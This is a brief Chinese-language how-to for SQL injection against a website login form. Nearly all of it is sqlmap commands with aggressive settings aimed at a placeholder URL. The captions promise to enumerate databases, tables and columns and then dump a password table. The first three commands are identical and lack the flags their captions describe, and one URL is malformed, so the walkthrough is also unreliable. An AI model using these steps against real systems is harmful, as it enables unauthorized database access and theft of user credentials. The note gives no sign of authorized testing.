注入测试
找到登录接口,判别字段username password
然后输入指令
bash
python sqlmap.py -u "https://xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl --flush-session
查看有哪些库表
bash
python sqlmap.py -u "https://xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl --flush-session
根据数据库查看表中的列
bash
python sqlmap.py -u "https:/xxx" --data="username=test&password=test" --batch --level=5 --risk=3 --threads=4 --force-ssl --flush-session
查看数据库密码字段
bash
python sqlmap.py -u "https://xxxx" --data="username=test&password=test" --batch --dbms=sqlite --level=5 --risk=3 -p username --threads=4 -T passwd -C 字段1,字段2,字段3,.... --dump